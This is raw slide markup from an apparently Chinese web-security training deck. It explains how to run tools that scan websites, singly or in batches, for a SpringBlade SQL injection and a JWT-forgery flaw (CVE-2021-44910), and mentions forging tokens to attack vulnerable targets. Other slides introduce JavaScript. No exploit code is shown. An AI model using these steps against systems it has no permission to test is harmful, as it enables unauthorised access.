              <a:t>在漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>POC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>栏：选择</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SpringBlade error/list SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入漏洞。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在地址栏：输入要检测的网站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>然后点击开始扫描即可，可以使用批量功能对一批网站进行批量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>检测。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>点击开始扫描按钮之后漏洞列表展示的是对应网站的分析结果而扫描日志则记录了时间和扫描的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>网站。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5886450" y="1296035"/>
            <a:ext cx="5996940" cy="4827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工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>二使用：</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373485" cy="5100320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目的：为了检测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Spring-Blade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>架构的网站是否存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JWT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>伪造的相关</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>环境：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Python3</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>项目</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址：https://github.com/W000i/CVE-2021-44910_SpringBlade</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>严格意义来说该工具是一个基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Python3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>编写的脚本并没有开发成工具，所以可以效率相对于前面的工具会差一些，但是已经满足</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用了。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>首先去项目地址下载CVE-2021-44910.py文件，并且准备好</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Python3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>环境，然后启动该脚本。从该脚本的源码可以看出是一个交互式的脚本，运行之后需要输入要检测的域名，然后直接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Enter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>即可。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="231775" y="4619625"/>
            <a:ext cx="9448800" cy="466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工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>二使用：</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49555" y="1214120"/>
            <a:ext cx="10965815" cy="5100320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>输入要检测的域名之后有必然如下两种结果。如果存在漏洞则可以使用对应的算法来生成伪造的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JWT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，然后对目标系统进行抓包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="641985" y="1997075"/>
            <a:ext cx="9050655" cy="4317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2" name="组合 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="788951" y="1672608"/>
            <a:ext cx="10402336" cy="2289792"/>
            <a:chOff x="788951" y="1582959"/>
            <a:chExt cx="10402336" cy="2289792"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="788951" y="1582959"/>
              <a:ext cx="10402336" cy="2289792"/>
              <a:chOff x="920210" y="1823315"/>
              <a:chExt cx="10200297" cy="2289792"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5" name="矩形: 对角圆角 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="920210" y="1823316"/>
                <a:ext cx="10200297" cy="2289791"/>
              </a:xfrm>
              <a:prstGeom prst="round2DiagRect">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 3520"/>
                  <a:gd name="adj2" fmla="val 2820"/>
                </a:avLst>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="6350">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="1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04000" bIns="0" rtlCol="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="360045" lvl="1" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="200000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="l"/>
                </a:pPr>
                <a:r>
                  <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JavaScript</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US"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（简称：</a:t>
                </a:r>
                <a:r>
                  <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JS</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US"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a:t>
                </a:r>
                <a:r>
                  <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 </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="85000"/>
                        <a:lumOff val="15000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>在 </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="85000"/>
                        <a:lumOff val="15000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>1995 </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="85000"/>
                        <a:lumOff val="15000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>年由布兰登</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="85000"/>
                        <a:lumOff val="15000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>·</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="85000"/>
                        <a:lumOff val="15000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>艾奇（</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="85000"/>
                        <a:lumOff val="15000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Brendan </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="85000"/>
                        <a:lumOff val="15000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Eich</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="85000"/>
                        <a:lumOff val="15000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>）</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="85000"/>
                        <a:lumOff val="15000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="85000"/>
                        <a:lumOff val="15000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>发明，并于 </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="85000"/>
                        <a:lumOff val="15000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>1997 </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="85000"/>
                        <a:lumOff val="15000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>年成为一部 </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="85000"/>
                        <a:lumOff val="15000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>ECMA </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="85000"/>
                        <a:lumOff val="15000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>标准。是一门跨平台、面向对象的脚本语言，来控制网页行为的，它能使网页可交互。</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="85000"/>
                      <a:lumOff val="15000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="360045" lvl="1" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="200000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="l"/>
                </a:pPr>
                <a:r>
                  <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JavaScript </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US"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和 </a:t>
                </a:r>
                <a:r>
                  <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Java </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US"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是完全不同的语言，不论是概念还是设计。但是基础语法类似。</a:t>
                </a:r>
                <a:endPar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endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="360045" lvl="1" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="200000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="l"/>
                </a:pPr>
                <a:r>
                  <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ECMAScript 6 (ES6)</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US"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 是最新的 </a:t>
                </a:r>
                <a:r>
                  <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JavaScript </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US"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版本（发布于 </a:t>
                </a:r>
                <a:r>
                  <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2015 </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US"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年</a:t>
                </a:r>
                <a:r>
                  <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a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US"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a:t>
                </a:r>
                <a:endPar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endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="矩形: 对角圆角 9"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="920210" y="1823315"/>
                <a:ext cx="2198636" cy="431800"/>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JavaScript</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4" name="Shape 2621"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="950631" y="1658975"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 对角圆角 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="788951" y="5808546"/>
            <a:ext cx="10735309" cy="621460"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000">
              <a:alpha val="14902"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="63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nSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:ea typeface="Alibaba PuHuiTi R"/>
              </a:rPr>
              <a:t>ECMAScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:ea typeface="Alibaba PuHuiTi R"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="Alibaba PuHuiTi R"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="Alibaba PuHuiTi R"/>
              </a:rPr>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="Alibaba PuHuiTi R"/>
              </a:rPr>
              <a:t>ECMA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="Alibaba PuHuiTi R"/>
              </a:rPr>
              <a:t>（欧洲计算机制造商协会）进行了标准化的一门语言，这种语言在万维网应用广泛，规定了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="Alibaba PuHuiTi R"/>
              </a:rPr>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="Alibaba PuHuiTi R"/>
              </a:rPr>
              <a:t>的编程语法和基础核心知识，是所有浏览器厂商共同遵守的一套</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="Alibaba PuHuiTi R"/>
              </a:rPr>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="Alibaba PuHuiTi R"/>
              </a:rPr>
              <a:t>语法工业标准。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ea typeface="Alibaba PuHuiTi R"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="灯片编号占位符 8"/>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结语</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8115" y="1213485"/>
            <a:ext cx="7668895" cy="5100955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="6600" b="1">
              <a:latin typeface="仿宋_GB2312" panose="02010609030101010101" charset="-122"/>
              <a:ea typeface="仿宋_GB2312" panose="02010609030101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6000">
                <a:latin typeface="仿宋_GB2312" panose="02010609030101010101" charset="-122"/>
                <a:ea typeface="仿宋_GB2312" panose="02010609030101010101" charset="-122"/>
              </a:rPr>
              <a:t>拿刀的不一定是屠夫，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="6000">
              <a:latin typeface="仿宋_GB2312" panose="02010609030101010101" charset="-122"/>
              <a:ea typeface="仿宋_GB2312" panose="02010609030101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6000">
                <a:latin typeface="仿宋_GB2312" panose="02010609030101010101" charset="-122"/>
                <a:ea typeface="仿宋_GB2312" panose="02010609030101010101" charset="-122"/>
              </a:rPr>
              <a:t>也有可能是伙夫，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="6000">
              <a:latin typeface="仿宋_GB2312" panose="02010609030101010101" charset="-122"/>
              <a:ea typeface="仿宋_GB2312" panose="02010609030101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6000">
                <a:latin typeface="仿宋_GB2312" panose="02010609030101010101" charset="-122"/>
                <a:ea typeface="仿宋_GB2312" panose="02010609030101010101" charset="-122"/>
              </a:rPr>
              <a:t>当然也有可能是大夫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="6600">
                <a:latin typeface="仿宋_GB2312" panose="02010609030101010101" charset="-122"/>
                <a:ea typeface="仿宋_GB2312" panose="02010609030101010101" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="6600">
              <a:latin typeface="仿宋_GB2312" panose="02010609030101010101" charset="-122"/>
              <a:ea typeface="仿宋_GB2312" panose="02010609030101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="6600">
              <a:latin typeface="仿宋_GB2312" panose="02010609030101010101" charset="-122"/>
              <a:ea typeface="仿宋_GB2312" panose="02010609030101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7582535" y="2018030"/>
            <a:ext cx="4329430" cy="3491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矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396943" y="1273332"/>
            <a:ext cx="4762346" cy="65894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如何让页面增加互动</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269943" y="2003459"/>
            <a:ext cx="4968027" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>绑定点击事件，调用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>函数，页面内容发生变化</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="396943" y="2601935"/>
            <a:ext cx="5158267" cy="3227365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5765800" y="1602805"/>
            <a:ext cx="5295900" cy="3213100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5788088" y="3775645"/>
            <a:ext cx="4165600" cy="2959100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
